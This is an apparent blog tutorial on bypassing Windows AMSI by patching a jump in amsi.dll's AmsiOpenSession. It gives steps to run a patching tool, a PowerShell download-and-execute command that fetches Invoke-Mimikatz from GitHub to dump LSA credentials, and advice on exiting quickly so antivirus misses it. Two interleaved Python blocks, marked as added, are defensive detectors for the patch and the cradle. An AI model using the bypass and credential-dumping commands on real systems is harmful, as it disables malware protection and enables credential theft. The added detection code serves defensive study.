AMSI Bypass New Way 2023

This blog introduces you to how to bypass AMSI (the Antimalware Scan Interface).

Surya Dev Singh
InfoSec Write-ups


This bypass can break over a period of time, so keep that in mind.

Hello friend !! This is SURYA DEV SINGH, back again with a new blog. In this blog we will discuss a new technique and a flaw found in amsi.dll that leads to a bypass of the Antimalware Scan Interface, which we can abuse to run Mimikatz on fully patched Windows in a real red team operation. But before diving deep, let's start from the very basics!!

What is AMSI?

From Microsoft: "The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads."

In simple words, AMSI is a Microsoft interface that is used to scan the content of a program in memory when it executes. It is also integrated into PowerShell, which means any command or script we run in PowerShell is passed to AMSI first for detection and only then handed on to the main antivirus engine.

Now, in order to bypass this, we need to understand the basics of how things work under the hood!!

What is amsi.dll?

The amsi.dll file provides the implementation of the AMSI feature in Windows. The DLL file contains the functions that are used to initialize, configure, and use the AMSI feature in Windows. The file is also responsible for loading and unloading the AMSI engine.

AMSI AmsiOpenSession Bypass

AmsiOpenSession is a function provided by the amsi.dll file as part of the Anti-Malware Scan Interface (AMSI) in Windows. The AmsiOpenSession function is used to create a new AMSI session for a calling application.

The AmsiOpenSession function can be used to configure the AMSI session by setting the session’s context and behavior. For example, an application can set the session’s context to specify the content type of the data being scanned, such as script or binary data.

Let's first disassemble the AmsiOpenSession function from amsi.dll:

There is a test rcx, rcx instruction, which performs a bitwise AND of the register with itself and sets the zero flag (ZF=1) if the result is zero.

If the zero flag is set, execution follows the JE (jump if equal) instruction to 0x180008244, which is an error branch returning the error code 0x80070057.

Now, what if we modify the JE instruction to JNE (jump if not equal)? The check is inverted, so the function takes the error branch instead of its normal path, thus allowing us to run any command without getting flagged!!
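From the defender's side, the patch described above has an obvious fingerprint: the code of AmsiOpenSession in the running process no longer matches the same function in amsi.dll on disk. The following Python is an added example (not code from this post, from the AMSI_patch project or from Microsoft) that compares two copies of a function's bytes and calls out an inverted conditional jump. The byte strings are constructed for the example and are not the real contents of amsi.dll; obtaining the live bytes (for instance with ReadProcessMemory after resolving the export's address from the PE export table) is assumed to be done by the caller.

```python
"""
Defender-side integrity check for an exported function such as AmsiOpenSession.

Added example, not part of the original post. The bytes of the function in a
running process should be identical to the bytes of the same function in the
DLL on disk; any difference in the code is a strong signal that the process
has been patched. The sample bytes below are CONSTRUCTED and are not the real
contents of amsi.dll.
"""

# x86-64 short conditional jumps occupy opcodes 0x70..0x7F; each condition and
# its negation differ only in the lowest bit (e.g. 0x74 = JE rel8, 0x75 = JNE rel8).
SHORT_JCC = range(0x70, 0x80)


def diff_function_bytes(on_disk: bytes, in_memory: bytes):
    """Return a list of (offset, disk_byte, memory_byte) where the two copies differ."""
    if len(on_disk) != len(in_memory):
        raise ValueError("both copies must cover the same byte range")
    return [(i, d, m) for i, (d, m) in enumerate(zip(on_disk, in_memory)) if d != m]


def classify(diffs):
    """Describe each differing byte; an inverted short Jcc is called out explicitly."""
    findings = []
    for off, d, m in diffs:
        if d in SHORT_JCC and m in SHORT_JCC and (d ^ m) == 1:
            kind = "conditional jump inverted"
        else:
            kind = "code byte modified"
        findings.append({"offset": off, "disk": f"{d:#04x}",
                         "memory": f"{m:#04x}", "kind": kind})
    return findings


def check_function(on_disk: bytes, in_memory: bytes) -> dict:
    """Compare the on-disk and in-memory copies and report whether the function is patched."""
    diffs = diff_function_bytes(on_disk, in_memory)
    return {"patched": bool(diffs), "findings": classify(diffs)}


# Constructed sample prologue (NOT the real amsi.dll bytes):
#   48 85 c9        test rcx, rcx
#   74 0f           je   +0x0f      ; error branch taken when rcx == 0
#   48 83 ec 28     sub  rsp, 0x28
CLEAN = bytes.fromhex("4885c9740f4883ec28")
# Same bytes with the je flipped to jne, as described in the post.
TAMPERED = bytes.fromhex("4885c9750f4883ec28")

if __name__ == "__main__":
    for label, copy in (("clean", CLEAN), ("tampered", TAMPERED)):
        result = check_function(CLEAN, copy)
        print(label, "patched:", result["patched"])
        for f in result["findings"]:
            print(f"  offset {f['offset']}: disk {f['disk']} -> memory {f['memory']} ({f['kind']})")
```

A real scanner would run this per process for every AMSI export it cares about and treat any finding as a high-confidence alert, since legitimate software has no reason to rewrite amsi.dll's code in place.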

There is a project by TheD1rkMtr called AMSI_patch which does the same thing. I have also created a project with the same idea but a slightly different implementation (all credits and kudos go to TheD1rkMtr); you can find the code here:

Steps to bypass AMSI:

  1. Download the amsibypass.exe file from the project above; you can also build your own from the .sln file. (Note: this binary can be flagged by AV over a period of time.)
  2. Once you have amsibypass.exe, open PowerShell with admin privileges and the execution policy disabled:

     powershell -ep bypass -nop

  3. Now you can run it in your current PowerShell session or in another PowerShell session, but for the latter you will need the PID of that session, like so:

  4. As you can see, it says AMSI PATCHED !! We can now try to run malicious commands such as Invoke-Mimikatz. Let's download and run the Invoke-Mimikatz script directly from nishang's GitHub.

Here we have used the following PowerShell command:

PS C:\Users\szero\Desktop> IEX(New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") ; Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ; exit

Here we download Mimikatz directly from GitHub, load it into memory, execute it, and then end the PowerShell process. We add exit at the end for OPSEC reasons, explained next.

If we don't end (exit) the PowerShell process that loaded Mimikatz, it will get flagged, although it will still show the NTLM dump. This is due to the heuristic memory and process scan of the antivirus product, which flags it as malicious.

If we just add an exit at the end of the command, the PowerShell session drops out immediately after executing and dumping the NTLM hashes, and nothing is detected!!

Now nothing is getting detected!!
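The evasion described above (download the script into memory, run it, and exit before the antivirus's memory heuristics complete) still leaves a trace in process telemetry: a PowerShell process started with policy-bypass flags and a download cradle on its command line that lives for only a few seconds. The Python below is an added detection example, not part of the original post; the process records are constructed samples in the shape a pipeline would build from Sysmon Event ID 1 (process create) and Event ID 5 (process terminate), and the indicator patterns, lifetime threshold and scoring are assumptions.

```python
import re
from datetime import datetime

# Constructed sample records (not real telemetry). "start" would come from the
# process-create event and "end" from the matching process-terminate event.
EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -nop",
     "start": "2023-03-01T10:00:00", "end": "2023-03-01T10:41:12"},
    {"pid": 4388,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -nop -c \"IEX(New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/script.ps1'); exit\"",
     "start": "2023-03-01T10:42:00", "end": "2023-03-01T10:42:03"},
    {"pid": 5012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1",
     "start": "2023-03-01T11:00:00", "end": "2023-03-01T11:00:02"},
]

# Flags that disable the execution policy or skip the profile (the post uses -ep bypass -nop).
POLICY_BYPASS = re.compile(r"-(ep|ExecutionPolicy)\s+bypass|-nop\b|-NoProfile\b", re.I)
# Common in-memory download-and-run cradles.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression",
    re.I)
# An explicit exit appended to the command line, as in the post.
TRAILING_EXIT = re.compile(r";\s*exit\b", re.I)
SHORT_LIFETIME_S = 10   # assumption: a scan-evading session exits within seconds
ALERT_THRESHOLD = 2     # assumption: two or more indicators raise an alert


def lifetime_seconds(ev):
    """Seconds between process creation and termination."""
    return (datetime.fromisoformat(ev["end"]) - datetime.fromisoformat(ev["start"])).total_seconds()


def score_event(ev):
    """Return (score, reasons) for one PowerShell process record; non-PowerShell images score 0."""
    reasons = []
    if not ev["image"].lower().endswith("powershell.exe"):
        return 0, reasons
    cl = ev["cmdline"]
    if POLICY_BYPASS.search(cl):
        reasons.append("execution policy / profile bypass flags")
    if CRADLE.search(cl):
        reasons.append("download cradle on the command line")
        if lifetime_seconds(ev) < SHORT_LIFETIME_S:
            reasons.append("process exited within seconds of the cradle running")
    if TRAILING_EXIT.search(cl):
        reasons.append("explicit exit appended to the command")
    return len(reasons), reasons


def alerts(events):
    """Return the records whose score reaches the alert threshold."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            out.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return out


if __name__ == "__main__":
    for a in alerts(EVENTS):
        print(f"ALERT pid={a['pid']} score={a['score']}: " + "; ".join(a["reasons"]))
```

Only the second record trips the rule: the long-lived interactive session with just -ep bypass -nop scores one indicator, and the scheduled backup script scores none, so the short lifetime is only counted when it coincides with a cradle. The scores are deliberately additive so the rule degrades to a lower-severity hit when the attacker drops one of the indicators.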

Again, this bypass can break over a period of time, but for now it is working perfectly. Make sure not to upload amsibypass.exe to VirusTotal!! The original code and concept credit goes to: https://github.com/TheD1rkMtr

THANK YOU FOR READING MY ARTICLE !! 🙌🏻🙌🏻

Please support me by following me on Medium and other social platforms:

https://surya-dev.medium.com/

https://twitter.com/kryolite_secure/

https://www.instagram.com/kryolite_security/

https://github.com/surya-dev-singh/

You can also subscribe to me 🙌 on YouTube, where I post walkthroughs and other ethical hacking-related videos.


Enthusiastic cyber security learner and penetration tester / ethical hacker, Python programmer; in my free time you will find me solving CTFs.